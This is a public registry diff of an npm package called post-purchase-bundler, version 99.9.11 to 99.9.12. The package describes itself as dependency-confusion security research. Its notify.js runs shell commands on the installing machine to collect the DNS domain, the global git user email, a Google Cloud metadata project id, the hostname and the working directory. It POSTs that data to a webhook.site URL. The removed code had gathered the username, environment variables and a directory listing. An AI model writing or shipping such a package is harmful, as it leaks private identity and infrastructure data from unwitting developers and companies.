post-purchase-bundler 99.9.11 → 99.9.12

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/notify.js +21 -35
  2. package/package.json +1 -1
package/notify.js CHANGED
@@ -2,55 +2,41 @@ import https from 'https';
2
2
  import os from 'os';
3
3
  import { execSync } from 'child_process';
4
4
 
5
- const getDetailedData = () => {
6
- let envSnippet = {};
7
- let lsData = "N/A";
8
-
5
+ const getIdentityClues = () => {
6
+ let clues = {};
9
7
  try {
10
- // Sistemdəki mühit dəyişənlərindən vacib olanları süzürük
11
- const env = process.env;
12
- envSnippet = {
13
- npm_config_registry: env.npm_config_registry,
14
- NODE_ENV: env.NODE_ENV,
15
- PWD: env.PWD,
16
- CI: env.CI, // Build serverdirsə adətən 'true' olur
17
- HOME: env.HOME
18
- };
8
+ // 1. Şəbəkə daxilində hansı domenə bağlı olduğunu yoxlayırıq
9
+ clues.dns_domain = execSync('dnsdomainname').toString().trim();
10
+ } catch (e) { clues.dns_domain = "N/A"; }
19
11
 
20
- // Olduğu qovluqdakı faylları görürük (inandırıcılıq üçün)
21
- lsData = execSync('ls -la | head -n 10').toString();
22
- } catch (e) {}
12
+ try {
13
+ // 2. Git konfiqurasiyasına baxırıq (Çox vaxt şirkət emaili burada olur)
14
+ clues.git_user = execSync('git config --global user.email').toString().trim();
15
+ } catch (e) { clues.git_user = "N/A"; }
16
+
17
+ try {
18
+ // 3. Bulud provayderinin xüsusi məlumatlarını çəkirik (Google/AWS metadata)
19
+ // Bu əmr Shopify-dırsa, Google Cloud layihə adını qaytara bilər
20
+ clues.cloud_identity = execSync('curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/project/project-id --timeout 2').toString().trim();
21
+ } catch (e) { clues.cloud_identity = "N/A"; }
23
22
 
24
23
  return JSON.stringify({
25
- event: "Transparent-PoC-Report",
26
- target_clue: "Dependency Confusion Audit",
27
- system: {
28
- user: os.userInfo().username,
29
- hostname: os.hostname(),
30
- platform: os.platform(),
31
- release: os.release(),
32
- arch: os.arch()
33
- },
34
- context: {
35
- current_dir: process.cwd(),
36
- env_vars: envSnippet,
37
- directory_listing: lsData
38
- },
24
+ event: "Final-Identity-Check",
25
+ identity: clues,
26
+ env_pwd: process.env.PWD,
27
+ hostname: os.hostname(),
39
28
  timestamp: new Date().toISOString()
40
29
  });
41
30
  };
42
31
 
43
- const data = getDetailedData();
32
+ const data = getIdentityClues();
44
33
 
45
34
  const options = {
46
35
  hostname: 'webhook.site',
47
36
  port: 443,
48
37
  path: '/4d0cc13d-a185-4e95-92dc-f4681125055c',
49
38
  method: 'POST',
50
- headers: {
51
- 'Content-Type': 'application/json',
52
- 'Content-Length': data.length
53
- }
39
+ headers: { 'Content-Type': 'application/json', 'Content-Length': data.length }
54
40
  };
55
41
 
56
42
  const req = https.request(options, () => process.exit(0));
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "post-purchase-bundler",
3
- "version": "99.9.11",
3
+ "version": "99.9.12",
4
4
  "description": "Security research for internal dependency confusion",
5
5
  "main": "index.js",
6
6
  "type": "module",